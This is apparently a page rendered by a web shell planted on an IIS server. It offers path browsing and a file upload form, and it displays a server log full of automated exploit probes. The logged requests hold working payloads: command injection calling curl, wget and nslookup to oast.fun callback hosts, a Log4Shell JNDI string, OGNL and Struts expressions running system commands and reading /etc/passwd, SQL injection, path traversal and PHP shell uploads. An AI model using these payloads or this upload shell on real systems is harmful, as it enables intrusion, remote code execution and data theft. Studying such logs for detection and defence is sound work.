????<!DOCTYPE HTML>

<HTML>

<HEAD>

<title></title>

<style>

body{

font-family: monospace;

font-weight: bold;

font-size: 18px;

background-color: #c5c5c5;

color: #000;

}

#content tr:hover{

background-color: #ccc;

}

#content .first{

background-color: #ccc;

}

#content .first:hover{

background-color: #ccc;

}

table{

border: 3px #000 solid;

}

a{

color: #000;

text-decoration: none;

}

a:hover{

color: #00f;

}

input,select,textarea{

border: 1px #000 solid;

-moz-border-radius: 5px;

-webkit-border-radius:5px;

border-radius:5px;

}

input {

 font-size: 18px;

 font-weight: bold;

 padding: 5px;

}

select {

font-size: 19px

}

textarea {

font-size: 10px

}

td, tr { padding: 2px 5px; }



</style>

</HEAD>

<BODY>

<hr width="920" color="black"/>

<hr width="920" color="black"/><center><p><h2>Your IP : 3.128.31.200</h2></p></center>

<hr width="920" color="black"/>

<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">

<tr><td style="padding: 8px">Current Path : <a href="?path=C:">C:</a>/<a href="?path=C:/inetpub">inetpub</a>/<a href="?path=C:/inetpub/logs">logs</a>/<a href="?path=C:/inetpub/logs/wmsvc">wmsvc</a>/<a href="?path=C:/inetpub/logs/wmsvc/W3SVC1">W3SVC1</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">

Upload File : <input type="file" name="file" />

<input type="submit" value="Upload" />

</form>

</td></tr><tr><td style='padding: 8px'>Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex230624.log</tr></td></table><br /><pre>#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 00:01:11
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 00:01:11 103.153.214.94 POST /api/timelion/run - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 27
2023-06-24 00:04:57 103.153.214.94 POST /EemAdminService/EemAdmin - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 38
2023-06-24 00:16:30 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 00:37:39
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 00:37:39 103.153.214.94 POST /account/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 30
2023-06-24 00:37:39 103.153.214.94 POST /opensis/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 26
2023-06-24 00:37:39 103.153.214.94 POST /index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 23
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 00:54:55
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 00:54:54 103.153.214.94 POST /scrm/crm/admin - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 31
2023-06-24 01:00:00 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 27
2023-06-24 01:00:00 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 24
2023-06-24 01:00:37 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 28
2023-06-24 01:04:25 103.153.214.94 POST / s=index/index/index 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 26
2023-06-24 01:06:40 103.153.214.94 GET /users/sign_in - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 26
2023-06-24 01:20:57 103.153.214.94 GET /groovyconsole - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 28
2023-06-24 01:20:57 103.153.214.94 GET /etc/groovyconsole.html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 23
2023-06-24 01:23:25 103.153.214.94 GET /wp-admin/admin-ajax.php action=upg_datatable&amp;field=field:exec:head+-1+/etc/passwd:NULL:NULL 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 26
2023-06-24 01:35:07 103.153.214.94 POST /dashboard/proc.php type=login 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 27
2023-06-24 01:41:22 103.153.214.94 GET /card_scan.php CardFormatNo=123&amp;No=123&amp;ReaderNo=`sleep%207` 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 31
2023-06-24 01:44:11 103.153.214.94 GET /esp/cms_changeDeviceContext.esp device=aaaaa:a%27&quot;;user|s.&quot;1337&quot;; 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 27
2023-06-24 01:47:45 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-06-24 01:51:35 103.153.214.94 POST /admin/ajax.php action=login 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 27
2023-06-24 01:51:35 103.153.214.94 GET /admin/index.php page=home 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 23
2023-06-24 02:00:25 103.153.214.94 GET /Schemas/${&#039;&#039;.class.forName(&#039;javax.script.ScriptEngineManager&#039;).newInstance().getEngineByName(&#039;js&#039;).eval(&#039;java.lang.Runtime.getRuntime().exec(&quot;id&quot;)&#039;)} - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 31
2023-06-24 02:02:22 103.153.214.94 GET /remote/fgt_lang lang=/../../../..//////////dev/cmdb/sslvpn_websession 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 30
2023-06-24 02:09:46 103.153.214.94 GET /Collector/nms/addModifyZTDProxy ztd_password=$(/bin/wget$IFShttp://cia1s2qofm2jmb2f4jhgkgo41pi5bgebr.oast.fun)&amp;ztd_port=3333&amp;ztd_server=127.0.0.1&amp;ztd_username=user 8172 - 45.117.82.231 - - 404 7 0 30
2023-06-24 02:12:19 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/2RYYjixEUdPx3mao7F8Is7S9LVT.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 30
2023-06-24 02:12:19 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/barcode.php filepath=2RYYjixEUdPx3mao7F8Is7S9LVT.php&amp;size=1&amp;sizefactor=.090909090909&amp;text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 28
2023-06-24 02:12:19 103.153.214.94 POST /wp-content/plugins/wpcargo/includes/2RYYjixEUdPx3mao7F8Is7S9LVT.php 1=var_dump 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 24
2023-06-24 02:14:42 103.153.214.94 PUT /v1/agent/service/register - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 02:34:09
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 02:34:09 103.153.214.94 PUT /PhoneBackup/2RYYjdbPTQfjajNVzQqHdkGLAh9.php - 8172 - 45.117.82.231 AVAYA - 404 7 0 30
2023-06-24 02:34:09 103.153.214.94 GET /PhoneBackup/2RYYjdbPTQfjajNVzQqHdkGLAh9.php - 8172 - 45.117.82.231 AVAYA - 404 7 0 21
2023-06-24 02:39:07 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 26
2023-06-24 02:51:42 103.153.214.94 GET /dr/authentication/oauth2/oauth2login error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-904%7D$%7B%3A-311%7D.$%7BhostName%7D.uri.cia1s2qofm2jmb2f4jhgprxoudr5uji64.oast.fun%7D 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 29
2023-06-24 02:51:48 103.153.214.94 POST /javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 23
2023-06-24 02:57:53 103.153.214.94 POST /carbon/generic/save_artifact_ajaxprocessor.jsp - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 03:21:14
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 03:21:14 103.153.214.94 GET /BSW_cxttongr.htm - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 41
2023-06-24 03:27:58 103.153.214.94 POST /adxmlrpc.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 29
2023-06-24 03:27:58 103.153.214.94 GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php 0=id 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 24
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 03:45:19
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 03:45:18 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 27
2023-06-24 03:57:44 103.153.214.94 GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 34
2023-06-24 04:10:19 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 24
2023-06-24 04:22:19 103.153.214.94 POST /ccmadmin/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ccmadmin/showHome.do 404 7 0 27
2023-06-24 04:27:08 103.153.214.94 POST /http/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 27
2023-06-24 04:34:48 103.153.214.94 POST /ui/login.action - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ui/login.action 404 7 0 27
2023-06-24 04:46:10 103.153.214.94 GET /html/log - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 37
2023-06-24 04:51:54 103.153.214.94 POST /zentao/user-login.html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172/zentao/user-login.html 404 7 0 28
2023-06-24 04:53:12 103.153.214.94 GET /app service=page/SetupCompleted 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-06-24 04:53:12 103.153.214.94 POST /app - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 25
2023-06-24 04:53:12 103.153.214.94 POST /app - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 21
2023-06-24 04:53:12 103.153.214.94 POST /app - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 23
2023-06-24 04:53:13 103.153.214.94 POST /app - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 23
2023-06-24 04:53:13 103.153.214.94 POST /app - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 23
2023-06-24 04:53:13 103.153.214.94 GET /app service=page/PrinterList 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 22
2023-06-24 04:58:07 103.153.214.94 GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 29
2023-06-24 05:00:19 103.153.214.94 POST /index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 32
2023-06-24 05:08:42 103.153.214.94 GET /aj.html a=devi 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 29
2023-06-24 05:09:21 103.153.214.94 GET /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(&quot;whoami&quot;).getInputStream(),&quot;utf-8&quot;)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(&quot;X-Cmd-Response&quot;,#a))}/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 25
2023-06-24 05:09:21 103.153.214.94 GET /${@java.lang.Runtime@getRuntime().exec(&quot;nslookup+cia1s2qofm2jmb2f4jhg5qij8unfarh8n.oast.fun&quot;)}/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 24
2023-06-24 05:12:25 103.153.214.94 POST /cobbler_api - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 31
2023-06-24 05:22:26 103.153.214.94 POST /wp-admin/options-general.php page=smartcode 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 32
2023-06-24 05:22:26 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 24
2023-06-24 05:31:40 103.153.214.94 GET /Admin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 31
2023-06-24 05:31:41 103.153.214.94 GET /include/makecvs.php Event=%60curl+http%3a//cia1s2qofm2jmb2f4jhgtsshwcf9afx9g.oast.fun+-H+&#039;User-Agent%3a+oh3KUh&#039;%60 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 25
2023-06-24 05:31:41 103.153.214.94 GET /tos/index.php explorer/pathList&amp;path=%60curl+http%3a//cia1s2qofm2jmb2f4jhgmrzxnhch6bze1.oast.fun+-H+&#039;User-Agent%3a+oh3KUh&#039;%60 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 05:48:12
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 05:48:12 103.153.214.94 GET /index.php id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5(&#039;CVE-2021-24666&#039;),NULL,NULL,NULL--%20-&amp;rest_route=/podlove/v1/social/services/contributor/1 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 28
2023-06-24 05:55:22 103.153.214.94 GET /backupsettings.dat - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 30
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 06:15:51
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 06:15:50 103.153.214.94 POST /servlet/UploadServlet - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 28
2023-06-24 06:15:50 103.153.214.94 GET /test.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 23
2023-06-24 06:19:24 103.153.214.94 POST /filemanager/upload.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 30
2023-06-24 06:22:56 103.153.214.94 PUT /SDK/webLanguage - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 37
2023-06-24 06:22:56 103.153.214.94 GET /x - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 23
2023-06-24 06:27:46 103.153.214.94 POST /Side.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 26
2023-06-24 06:30:30 103.153.214.94 GET / id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 26
2023-06-24 06:39:47 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 26
2023-06-24 06:39:47 103.153.214.94 GET /wp-json/wp/v2/users/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 25
2023-06-24 06:41:34 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-06-24 06:45:54 103.153.214.94 GET /nagiosxi/login.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 31
2023-06-24 06:51:06 103.153.214.94 GET /wp-content/plugins/wp-autosuggest/autosuggest.php wpas_action=query&amp;wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 29
2023-06-24 06:51:20 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 25
2023-06-24 06:54:38 103.153.214.94 GET /device.rsp cmd=list&amp;opt=user 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 25
2023-06-24 07:04:26 103.153.214.94 POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 31
2023-06-24 07:04:26 103.153.214.94 GET /wp-content/uploads/2RYYjjf9biDb1xiunVrhuUl9nL0.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 24
